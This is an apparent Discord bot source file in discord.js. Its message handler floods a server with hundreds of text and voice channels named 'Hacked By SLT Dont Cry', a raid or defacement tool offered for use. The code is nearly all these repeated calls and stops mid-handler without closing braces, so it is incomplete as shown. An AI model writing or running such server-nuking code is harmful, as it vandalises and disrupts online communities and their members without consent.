const Discord = require('discord.js');
const client = new Discord.Client();
const prefix = '+'

client.on('ready', () => {
  console.log(`Logged in as ${client.user.tag}!`);
client.user.setGame(`3rbMC`,"http://twitch.tv/A_K")
  console.log('')
  console.log('')
  console.log('╔[═════════════════════════════════════════════════════════════════]╗')
  console.log(`[Start] ${new Date()}`);
  console.log('╚[═════════════════════════════════════════════════════════════════]╝')
  console.log('')
  console.log('╔[════════════════════════════════════]╗');
  console.log(`Logged in as * [ " ${client.user.username} " ]`);
  console.log('')
  console.log('Informations :')
  console.log('')
  console.log(`servers! [ " ${client.guilds.size} " ]`);
  console.log(`Users! [ " ${client.users.size} " ]`);
  console.log(`channels! [ " ${client.channels.size} " ]`);
  console.log('╚[════════════════════════════════════]╝')
  console.log('')
  console.log('╔[════════════]╗')
  console.log(' Bot Is Online')
  console.log('╚[════════════]╝')
  console.log('')
  console.log('')
});




client.on('message' , async (message) => {
    const prefix = '.'
	if (message.content.startsWith(prefix + '.')) {
for (let i = 0; i < 1; i++) {
	

        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |"  SLT . "| Dont Cry.', 'voice')
        message.guild.createChannel('Hacked By |" SLT "| Dont Cry.', 'text')
